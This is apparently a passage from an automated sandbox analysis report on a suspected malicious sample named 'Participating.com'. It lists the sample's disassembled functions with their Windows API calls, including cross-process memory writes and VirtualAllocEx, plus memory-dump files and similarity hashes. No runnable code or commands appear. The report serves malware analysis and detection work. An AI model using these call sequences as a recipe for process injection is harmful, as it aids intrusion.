                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00D41916
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00D41922
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00D41931
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00D41938
                                                                                                                                                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00D4194E
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 44706859-0
                                                                                                                                                                                                                                                                  • Opcode ID: cb05c1cca102a97a161f5e52d2dc0ed47d2fa15261d21f28cd84d16f432c986b
                                                                                                                                                                                                                                                                  • Instruction ID: 108d4d39628ef90b101605b891ba7c54e7018a614d06342482dbdedcfb6355ca
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb05c1cca102a97a161f5e52d2dc0ed47d2fa15261d21f28cd84d16f432c986b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EEF0627A100301ABDB210F65DC4DF563B7EEF897A0F540414FA49D7360DA70DC808A70
                                                                                                                                                                                                                                                                  Function 00D50CB6 Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00D50B24,?,00D53D41,?,00000001,00D23AF4,?), ref: 00D50CCB
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00D50B24,?,00D53D41,?,00000001,00D23AF4,?), ref: 00D50CD8
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00D50B24,?,00D53D41,?,00000001,00D23AF4,?), ref: 00D50CE5
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00D50B24,?,00D53D41,?,00000001,00D23AF4,?), ref: 00D50CF2
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00D50B24,?,00D53D41,?,00000001,00D23AF4,?), ref: 00D50CFF
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00D50B24,?,00D53D41,?,00000001,00D23AF4,?), ref: 00D50D0C
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                  • Opcode ID: 37626697f4d639db6fbbc0505074c1c1352090057ea4c239ec7cb4457423f953
                                                                                                                                                                                                                                                                  • Instruction ID: f6488eec97920ebb7db983291a0fb392fab32f08bac62f7677375ab742d6cb3e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 37626697f4d639db6fbbc0505074c1c1352090057ea4c239ec7cb4457423f953
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C01A272800B55DFCB30AF66D980826FBF5BF503163198A3FD99652931C7B0A988DF90
                                                                                                                                                                                                                                                                  Function 00D465AB Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00D465BF
                                                                                                                                                                                                                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 00D465D6
                                                                                                                                                                                                                                                                  • MessageBeep.USER32(00000000), ref: 00D465EE
                                                                                                                                                                                                                                                                  • KillTimer.USER32(?,0000040A), ref: 00D4660A
                                                                                                                                                                                                                                                                  • EndDialog.USER32(?,00000001), ref: 00D46624
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3741023627-0
                                                                                                                                                                                                                                                                  • Opcode ID: e2fdaef959d32c7e13ca4608d339243e070767d14030a48975c71a34e01818c2
                                                                                                                                                                                                                                                                  • Instruction ID: 071a82cecbe6f52151d302dd17d20c1327567b46367b7b198159b9c8ac256234
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e2fdaef959d32c7e13ca4608d339243e070767d14030a48975c71a34e01818c2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E601A930500308ABEB346F20DD4EB9A7B79FF05705F040559B18BA14E1EBF1EA84CB61
                                                                                                                                                                                                                                                                  Function 00D1DABA Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D1DAD2
                                                                                                                                                                                                                                                                    • Part of subcall function 00D12D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00D1DB51,00DB1DC4,00000000,00DB1DC4,00000000,?,00D1DB78,00DB1DC4,00000007,00DB1DC4,?,00D1DF75,00DB1DC4), ref: 00D12D4E
                                                                                                                                                                                                                                                                    • Part of subcall function 00D12D38: GetLastError.KERNEL32(00DB1DC4,?,00D1DB51,00DB1DC4,00000000,00DB1DC4,00000000,?,00D1DB78,00DB1DC4,00000007,00DB1DC4,?,00D1DF75,00DB1DC4,00DB1DC4), ref: 00D12D60
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D1DAE4
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D1DAF6
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D1DB08
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D1DB1A
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                                  • Opcode ID: b68e703987861846a6b1242604eee5d222ab7834b10e70da10bd48df30d134a6
                                                                                                                                                                                                                                                                  • Instruction ID: 1742cb6f796a587a4855a24ff6b516809c64b0453029b9b41467a2269c231641
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b68e703987861846a6b1242604eee5d222ab7834b10e70da10bd48df30d134a6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94F0E772549314BB8624EB68F982CEA77EFEE057107A90805F00AD7A01CF25FCC08AB4
                                                                                                                                                                                                                                                                  Function 00D12610 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D1262E
                                                                                                                                                                                                                                                                    • Part of subcall function 00D12D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00D1DB51,00DB1DC4,00000000,00DB1DC4,00000000,?,00D1DB78,00DB1DC4,00000007,00DB1DC4,?,00D1DF75,00DB1DC4), ref: 00D12D4E
                                                                                                                                                                                                                                                                    • Part of subcall function 00D12D38: GetLastError.KERNEL32(00DB1DC4,?,00D1DB51,00DB1DC4,00000000,00DB1DC4,00000000,?,00D1DB78,00DB1DC4,00000007,00DB1DC4,?,00D1DF75,00DB1DC4,00DB1DC4), ref: 00D12D60
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D12640
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D12653
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D12664
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D12675
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                                  • Opcode ID: a5efd0be2161b1d2aa9c36c05aa7bbfecdff4ee659e14d2f0b3e5f1c8d9547ef
                                                                                                                                                                                                                                                                  • Instruction ID: 977ee54d888cc62f11ae348cf40c6ad009ccf9d8f5df62c13ddfccfb3aab5cc3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a5efd0be2161b1d2aa9c36c05aa7bbfecdff4ee659e14d2f0b3e5f1c8d9547ef
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EBF0BDB6801310EB8605AF64FC528F83665FB297613850706F415D6375CF364A61EEF4
                                                                                                                                                                                                                                                                  Function 00D112B7 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: __freea$_free
                                                                                                                                                                                                                                                                  • String ID: a/p$am/pm
                                                                                                                                                                                                                                                                  • API String ID: 3432400110-3206640213
                                                                                                                                                                                                                                                                  • Opcode ID: fed72e0dceb482a122773b5f1ee983714cade51781d4b1eb41e6ceaa1bc7b14a
                                                                                                                                                                                                                                                                  • Instruction ID: e21ae95dce5c89f7b3eac2e58548c1efcd6ca374d8b33406c378ef88e18851aa
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fed72e0dceb482a122773b5f1ee983714cade51781d4b1eb41e6ceaa1bc7b14a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 01D1F479910206FADB249FA8E8457FAB7B1FF05700F2C415AE6429B294DB359DC0CBB1
                                                                                                                                                                                                                                                                  Function 00D43063 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00D42B1D,?,?,00000034,00000800,?,00000034), ref: 00D4BDF4
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00D430AD
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00D42B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 00D4BDBF
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 00D4BD1C
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00D42AE1,00000034,?,?,00001004,00000000,00000000), ref: 00D4BD2C
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00D42AE1,00000034,?,?,00001004,00000000,00000000), ref: 00D4BD42
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00D4311A
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00D43167
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                                  • API String ID: 4150878124-2766056989
                                                                                                                                                                                                                                                                  • Opcode ID: 14c615f81ef475a4b545b302ad26c23e5c8821a2a3d420bc6b9047df42854465
                                                                                                                                                                                                                                                                  • Instruction ID: db494955fd2b5d9a02360a235094c1835f4cdc51260229f5ba859ddd5a79894b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 14c615f81ef475a4b545b302ad26c23e5c8821a2a3d420bc6b9047df42854465
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A411B72900218AFDB10DBA8CD85AEEBBB8EF55710F144095FA45B7181DB70AF85CB60
                                                                                                                                                                                                                                                                  Function 00D11A9E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\615578\Participating.com,00000104), ref: 00D11AD9
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D11BA4
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D11BAE
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                  • API String ID: 2506810119-3429811749
                                                                                                                                                                                                                                                                  • Opcode ID: 3c7c3963f4963d62ca7077239b6520324569bc1b4bc3d7abf72ea6a66b3a0ced
                                                                                                                                                                                                                                                                  • Instruction ID: a51633e1160a700590c8365371f004701b6c2c5b1edc476b18ef42338f50777f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3c7c3963f4963d62ca7077239b6520324569bc1b4bc3d7abf72ea6a66b3a0ced
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D318375A04218FFCB21DB99ED81DEEBBBCEF85710B1441A6E504D7211EA708E81CBB4
                                                                                                                                                                                                                                                                  Function 00D4CB28 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00D4CBB1
                                                                                                                                                                                                                                                                  • DeleteMenu.USER32(?,00000007,00000000), ref: 00D4CBF7
                                                                                                                                                                                                                                                                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00DB29C0,01736BD0), ref: 00D4CC40
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Menu$Delete$InfoItem
                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                  • API String ID: 135850232-4108050209
                                                                                                                                                                                                                                                                  • Opcode ID: 3eb975a36f9852e0cb0c421d054a663e3e3fba5c4d861f329ee54b7c0b2a226c
                                                                                                                                                                                                                                                                  • Instruction ID: 8d4a96570bc2fad8fed9b7f8aa0e50f9b339671bd532158f54372cbd75fe687a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3eb975a36f9852e0cb0c421d054a663e3e3fba5c4d861f329ee54b7c0b2a226c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C141BF312163429FD760DF24D885B2ABBE8EF85714F184A1DF5A997291DB30E904CB72
                                                                                                                                                                                                                                                                  Function 00D74EB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00D7DCD0,00000000,?,?,?,?), ref: 00D74F48
                                                                                                                                                                                                                                                                  • GetWindowLongW.USER32 ref: 00D74F65
                                                                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00D74F75
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$Long
                                                                                                                                                                                                                                                                  • String ID: SysTreeView32
                                                                                                                                                                                                                                                                  • API String ID: 847901565-1698111956
                                                                                                                                                                                                                                                                  • Opcode ID: 60f6f7bd0d8cedd60f36c187a4143f07b7dc53374478f9e2e3ccafe7d4313735
                                                                                                                                                                                                                                                                  • Instruction ID: 38ffce19211be4e386be1ba2e4614865932e32d8f1e3a6487adb5d64893400d6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 60f6f7bd0d8cedd60f36c187a4143f07b7dc53374478f9e2e3ccafe7d4313735
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C318F31204205AFDB228E78DC45BEAB7A9EF49334F248715F979E21E0E770EC509B60
                                                                                                                                                                                                                                                                  Function 00D63AAB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00D63DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00D63AD4,?,?), ref: 00D63DD5
                                                                                                                                                                                                                                                                  • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00D63AD7
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D63AF8
                                                                                                                                                                                                                                                                  • htons.WSOCK32(00000000,?,?,00000000), ref: 00D63B63
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                                                                                                                                                                  • String ID: 255.255.255.255
                                                                                                                                                                                                                                                                  • API String ID: 946324512-2422070025
